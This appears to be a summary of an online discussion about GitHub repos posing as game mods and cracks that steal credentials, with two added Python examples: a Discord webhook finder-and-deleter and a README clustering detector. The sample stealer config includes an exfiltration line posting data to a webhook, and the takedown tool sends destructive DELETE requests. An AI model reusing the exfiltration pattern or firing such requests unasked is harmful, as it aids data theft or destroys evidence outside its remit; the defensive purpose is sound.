Github scam investigation: Thousands of “mods” and “cracks” stealing data
Role of GitHub in Hosting Malware
- Strong view that repos used as delivery mechanisms for credential‑stealing malware are “doing harm” and violate GitHub’s active‑malware policy, so they should be removed.
- Counter‑view: deleting them only moves distribution elsewhere and reduces visibility for researchers; maybe better to flag with strong warnings, extra confirmation steps, or “dangerous repo” banners.
- Common middle ground: clearly labeled malware/stealer code for research is acceptable; deceptive repos impersonating mods/cracks are not. Intent and presentation matter.
Microsoft / GitHub Abuse Handling
- Many comments argue Microsoft has a broad spam/malware problem across products (GitHub, Azure feedback, email infrastructure) and weak, slow moderation.
- Some users report quick, effective action from GitHub abuse team when malware is clearly documented; others describe multi‑day to multi‑month delays or no response at all.
- Perception that the abuse‑reporting UX is poor, rate‑limited, and handles reports one repo at a time rather than by pattern, so large template‑based campaigns can persist for years.
- Concern that AI is already generating spammy comments and low‑quality content, yet is not effectively used to combat abuse.
Specific Campaign: Mods/Cracks + Discord Webhooks
- Malware campaigns target game “mods,” “cracks,” and “cheats,” often aimed at kids, with SEO‑optimized GitHub repos giving them credibility.
- These typically exfiltrate browser cookies, saved credentials, cryptocurrency wallet data, etc., by posting them to attacker‑controlled Discord webhooks.
- Multiple people note that anyone holding the webhook URL can delete the webhook by sending an HTTP DELETE request to it, because the URL already embeds the webhook's id and token and Discord requires no other authentication for that call; others suggest it is better to report the webhook to Discord so the attacker's accounts/servers get banned and the data is retained for investigations, whereas deleting it removes the evidence along with the hook.
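As an added example (not code from the original discussion), the Python below shows what "send a DELETE request" means in practice: Discord's documented delete‑webhook‑with‑token endpoint is `DELETE /webhooks/{id}/{token}`, and the webhook URL a stealer embeds already carries both values, so whoever holds the URL can tear the hook down without any further credential. The stealer snippet, the ids and tokens, and the function names are constructed here for illustration; the tool defaults to a dry run because, as noted above, deleting the hook also destroys evidence that a report to Discord would preserve.

```python
import re
import urllib.error
import urllib.request

# Constructed sample of a decoded stealer config. IDs and tokens are made up
# and do not correspond to any real webhook.
_TOKEN_A = "AbCdEf" + "x" * 62   # made-up 68-char webhook token
_TOKEN_B = "ZyXwVu" + "y" * 62
SAMPLE_STEALER_CONFIG = f"""
WEBHOOK = "https://discord.com/api/webhooks/123456789012345678/{_TOKEN_A}"
BACKUP  = 'https://discordapp.com/api/webhooks/987654321098765432/{_TOKEN_B}'
requests.post("https://discord.com/api/webhooks/123456789012345678/{_TOKEN_A}", json=payload)
"""

# Webhook URL shape: https://discord.com/api/webhooks/<snowflake id>/<token>
# (discordapp.com, ptb./canary. hosts and an optional /vN/ prefix also occur).
WEBHOOK_RE = re.compile(
    r"https://(?:(?:ptb|canary)\.)?discord(?:app)?\.com/api/(?:v\d+/)?"
    r"webhooks/(\d{17,20})/([A-Za-z0-9_-]{30,})"
)


def find_webhooks(blob: str) -> list[tuple[str, str, str]]:
    """Return (url, webhook_id, token) for each distinct webhook URL in blob, in order of first appearance."""
    seen, found = set(), []
    for m in WEBHOOK_RE.finditer(blob):
        url = m.group(0)
        if url not in seen:
            seen.add(url)
            found.append((url, m.group(1), m.group(2)))
    return found


def delete_request(webhook_id: str, token: str) -> urllib.request.Request:
    """Build the unauthenticated DELETE that removes the webhook.

    The token in the path *is* the credential; no bot token or user login is involved.
    The canonical host is used regardless of which alias the malware referenced.
    """
    return urllib.request.Request(
        f"https://discord.com/api/webhooks/{webhook_id}/{token}",
        method="DELETE",
        headers={"User-Agent": "webhook-takedown-example/1.0"},
    )


def disable_webhooks(blob: str, *, dry_run: bool = True) -> list[dict]:
    """Find every webhook in blob and (unless dry_run) send the DELETE.

    Result entries never contain the full token, so they are safe to log or attach to a report.
    """
    results = []
    for _url, wid, tok in find_webhooks(blob):
        req = delete_request(wid, tok)
        entry = {"id": wid, "token_prefix": tok[:6] + "...", "method": req.get_method()}
        if dry_run:
            # Deleting cuts off the exfil channel but also erases evidence a Discord
            # abuse report would preserve, so the destructive path is opt-in.
            entry["status"] = "dry-run"
        else:
            try:
                with urllib.request.urlopen(req, timeout=10) as resp:
                    entry["status"] = resp.status      # Discord answers 204 No Content on success
            except urllib.error.HTTPError as err:
                entry["status"] = err.code             # 404: already gone or bad id/token
        results.append(entry)
    return results


if __name__ == "__main__":
    for r in disable_webhooks(SAMPLE_STEALER_CONFIG):
        print(r)
```

Run with `dry_run=False` only after the artifact has been reported and preserved; the result list deliberately redacts tokens so it can be pasted into a ticket without handing the hook to anyone else.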
User Practices, OS Design, and Piracy
- Advice: never blindly search GitHub or the web for mods/cracks; only use links from official sites, trusted forums, or reviewed sources.
- Observation that Defender’s broad flagging of keygens trains some users to disable AV, making them vulnerable when real malware appears.
- Suggestion that stronger OS‑level isolation (sandboxing apps to only their own files, like Android or Qubes‑style models) would greatly limit damage from running untrusted mods, since a sandboxed mod could not read browser profiles or wallet files in the first place, though this would break many existing integrations.
Mitigations and Community Ideas
- Proposals include:
  - Locking or “quarantining” suspicious repos rather than outright deletion.
  - An open database plus a browser extension that warns on known‑bad GitHub repos.
  - Better automation at GitHub for detecting large template‑based campaigns.
- Some argue focusing on GitHub alone is insufficient since similar abuse exists on npm and other platforms.
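The automation proposal above is the cheapest of these to prototype: the campaigns are template‑based, so their READMEs are near‑duplicates of one another with only the game name swapped. The following is an added example, not GitHub's tooling or anything from the original discussion: it shingles constructed README texts into word trigrams, single‑links repos whose Jaccard similarity clears a threshold, and reports any cluster large enough to look like a campaign rather than a coincidence. Repo names, README texts, the threshold and the minimum cluster size are all made up for illustration.

```python
import re
from collections import defaultdict

# Constructed READMEs: four repos stamped from one SEO template (only the game
# name varies) plus two unrelated, legitimate-looking projects.
_TEMPLATE = (
    "{g} mod menu free download latest version of {g} mod menu with aimbot esp "
    "and wallhack undetected works on windows 10 and 11 password for the archive "
    "is 1234 join our discord for updates"
)
SAMPLE_READMES = {
    "acc1/alphaquest-mod-menu": _TEMPLATE.format(g="alphaquest"),
    "acc2/betacraft-mod-menu": _TEMPLATE.format(g="betacraft"),
    "acc3/gammarun-cheat": _TEMPLATE.format(g="gammarun"),
    "acc4/deltashift-hack": _TEMPLATE.format(g="deltashift"),
    "dev/tiled-parser": "A small library for parsing tiled map files. Build with cargo build "
                        "and run the tests with cargo test. Licensed under MIT.",
    "dev/biome-mod": "This mod adds new biomes to the game. Install by copying the jar into "
                     "your mods folder. Source code is in src and bugs go on the issue tracker.",
}


def shingles(text: str, k: int = 3) -> set[str]:
    """Word k-grams of the lowercased text; the unit of comparison for near-duplicate detection."""
    words = re.findall(r"[a-z0-9]+", text.lower())
    return {" ".join(words[i:i + k]) for i in range(len(words) - k + 1)}


def jaccard(a: set[str], b: set[str]) -> float:
    """|A ∩ B| / |A ∪ B|; 1.0 for identical texts, ~0 for unrelated ones."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0


def cluster_repos(readmes: dict[str, str], threshold: float = 0.6) -> list[list[str]]:
    """Single-linkage clustering: repos whose READMEs score >= threshold end up in one group.

    Union-find keeps this O(n^2) pairwise pass simple; for platform scale you would
    replace the exhaustive comparison with MinHash/LSH candidate generation.
    """
    names = sorted(readmes)
    sig = {n: shingles(readmes[n]) for n in names}
    parent = {n: n for n in names}

    def find(x: str) -> str:
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving
            x = parent[x]
        return x

    for i, a in enumerate(names):
        for b in names[i + 1:]:
            if jaccard(sig[a], sig[b]) >= threshold:
                parent[find(a)] = find(b)

    groups = defaultdict(list)
    for n in names:
        groups[find(n)].append(n)
    return sorted(groups.values(), key=lambda g: (-len(g), g[0]))


def suspected_campaigns(readmes: dict[str, str], threshold: float = 0.6,
                        min_size: int = 3) -> list[list[str]]:
    """Clusters big enough that shared boilerplate is unlikely to be accidental."""
    return [g for g in cluster_repos(readmes, threshold) if len(g) >= min_size]


if __name__ == "__main__":
    for group in suspected_campaigns(SAMPLE_READMES):
        print(f"campaign candidate ({len(group)} repos):", ", ".join(group))
```

Text similarity is only one signal, and a determined operator can paraphrase around it; in practice it would be combined with the account and repo metadata the platform already holds, but even alone it turns a one‑repo‑at‑a‑time report queue into a cluster that can be actioned as a unit.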